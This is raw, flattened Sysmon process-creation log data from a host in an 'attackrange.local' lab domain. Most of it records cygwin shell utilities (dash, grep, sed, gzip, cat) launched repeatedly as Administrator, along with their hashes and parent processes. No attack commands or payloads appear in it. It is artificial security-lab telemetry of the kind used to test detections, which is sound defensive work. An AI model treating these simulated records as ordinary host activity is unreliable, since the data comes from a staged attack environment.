14:55:56.086{A8622C2F-53FC-6078-7609-00000000AE01}4344C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FC-6078-7309-00000000AE01}4160C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049683Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.086{A8622C2F-53FC-6078-7509-00000000AE01}1392C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049665Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.078{A8622C2F-53FC-6078-7409-00000000AE01}2952C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FC-6078-7209-00000000AE01}6968C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049663Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.078{A8622C2F-53FC-6078-7309-00000000AE01}4160C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049651Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.071{A8622C2F-53FC-6078-7209-00000000AE01}6968C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049639Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.063{A8622C2F-53FC-6078-7109-00000000AE01}616C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FC-6078-7009-00000000AE01}5832C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049628Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.056{A8622C2F-53FC-6078-7009-00000000AE01}5832C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049616Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.048{A8622C2F-53FC-6078-6F09-00000000AE01}1156C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FC-6078-6D09-00000000AE01}5620C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049598Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.040{A8622C2F-53FC-6078-6E09-00000000AE01}5516C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FC-6078-6B09-00000000AE01}5828C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049596Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.040{A8622C2F-53FC-6078-6D09-00000000AE01}5620C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049578Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.033{A8622C2F-53FC-6078-6C09-00000000AE01}6416C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FC-6078-6A09-00000000AE01}2084C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049576Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.032{A8622C2F-53FC-6078-6B09-00000000AE01}5828C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049564Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.025{A8622C2F-53FC-6078-6A09-00000000AE01}2084C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049552Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.017{A8622C2F-53FC-6078-6909-00000000AE01}6064C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FC-6078-6809-00000000AE01}3300C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049542Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.010{A8622C2F-53FC-6078-6809-00000000AE01}3300C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049530Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:56.002{A8622C2F-53FC-6078-6709-00000000AE01}4364C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FB-6078-6509-00000000AE01}3136C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049511Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.994{A8622C2F-53FB-6078-6609-00000000AE01}5628C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FB-6078-6309-00000000AE01}5312C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049509Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.994{A8622C2F-53FB-6078-6509-00000000AE01}3136C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049490Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.987{A8622C2F-53FB-6078-6409-00000000AE01}6364C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FB-6078-6209-00000000AE01}6808C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049489Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.987{A8622C2F-53FB-6078-6309-00000000AE01}5312C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049477Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.980{A8622C2F-53FB-6078-6209-00000000AE01}6808C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049465Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.972{A8622C2F-53FB-6078-6109-00000000AE01}1392C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FB-6078-6009-00000000AE01}6268C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049455Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.965{A8622C2F-53FB-6078-6009-00000000AE01}6268C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049443Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.956{A8622C2F-53FB-6078-5F09-00000000AE01}5184C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FB-6078-5D09-00000000AE01}1348C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049425Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.949{A8622C2F-53FB-6078-5E09-00000000AE01}5412C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FB-6078-5B09-00000000AE01}5144C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049423Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.949{A8622C2F-53FB-6078-5D09-00000000AE01}1348C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049404Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.942{A8622C2F-53FB-6078-5C09-00000000AE01}5404C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FB-6078-5A09-00000000AE01}4832C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049403Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.941{A8622C2F-53FB-6078-5B09-00000000AE01}5144C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049391Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.934{A8622C2F-53FB-6078-5A09-00000000AE01}4832C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049378Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.926{A8622C2F-53FB-6078-5909-00000000AE01}5620C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FB-6078-5809-00000000AE01}5052C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049368Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.919{A8622C2F-53FB-6078-5809-00000000AE01}5052C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049356Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.911{A8622C2F-53FB-6078-5709-00000000AE01}6240C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FB-6078-5509-00000000AE01}3304C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049337Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.903{A8622C2F-53FB-6078-5609-00000000AE01}4300C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FB-6078-5309-00000000AE01}4476C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049335Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.903{A8622C2F-53FB-6078-5509-00000000AE01}3304C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049316Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.896{A8622C2F-53FB-6078-5409-00000000AE01}6076C:\cygwin64\bin\gzip.exe-----"C:\cygwin64\bin\gzip.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=69CEDD6B542D0FF34889F3722B561A72,SHA256=0BF19AC24F15A5F11BC9A99336A736C11F63261AE1809E7663C37CC3FA144880,IMPHASH=A380123EE5A1337EA05DC013C75D0A34{A8622C2F-53FB-6078-5209-00000000AE01}6440C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049315Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.896{A8622C2F-53FB-6078-5309-00000000AE01}4476C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049303Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.889{A8622C2F-53FB-6078-5209-00000000AE01}6440C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049291Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.881{A8622C2F-53FB-6078-5109-00000000AE01}3008C:\cygwin64\bin\cat.exe-----"C:\cygwin64\bin\cat.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=ADF5161F9576FAB9D0DF99ED7FE60B1D,SHA256=1DD069EF0DC312E8F4CA7E4D20C785612D23A138D93A1553D564C0EABA45B2B5,IMPHASH=1E615C60AEF3904C527727A2505D9B81{A8622C2F-53FB-6078-5009-00000000AE01}4384C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049280Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.874{A8622C2F-53FB-6078-5009-00000000AE01}4384C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049268Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.866{A8622C2F-53FB-6078-4F09-00000000AE01}6084C:\cygwin64\bin\sed.exe-----"C:\cygwin64\bin\sed.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=0B641D33E8C3F5C21382EB8CB9D2C2CD,SHA256=78354D46F5E67DCDBED0FAAF1FF83CA2CE83715D3CC77CDE71C1BA8CC3FE01D5,IMPHASH=A10FE840069588D724DECD69D92555B1{A8622C2F-53FB-6078-4D09-00000000AE01}1844C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049250Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.858{A8622C2F-53FB-6078-4E09-00000000AE01}1392C:\cygwin64\bin\grep.exe-----"C:\cygwin64\bin\grep.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=CA1CD62425F876E4BC2C9CAB8BA8E1FD,SHA256=A1E5531CDC240EB71083B84EA6CDFEDA5FD6BC25F2A586D52E9EF93E590D3CB6,IMPHASH=967DF82421BE009A6974726B7AE3D8E8{A8622C2F-53FB-6078-4B09-00000000AE01}6852C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049248Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 14:55:55.858{A8622C2F-53FB-6078-4D09-00000000AE01}1844C:\cygwin64\bin\dash.exe-----"C:\cygwin64\bin\dash.exe"C:\cygwin64\ATTACKRANGE\Administrator{A8622C2F-41CA-6078-C929-230000000000}0x2329c92HighMD5=13A2EF33299A78FD1CF57C64EE770C89,SHA256=8E0DCE0940EE068089BD369F4E1FA70E01005C11DDD33CAF1FDF947202FE485A,IMPHASH=75EFD9C0CB70189EBD8D54FB49C5CEA2{A8622C2F-53F9-6078-C807-00000000AE01}1580C:\cygwin64\bin\dash.exe"C:\cygwin64\bin\dash.exe" 154100x800000000000000049229Microsoft-Windows-Sysmon/Operationalwin-dc-281.attackrange.local-2021-04-15 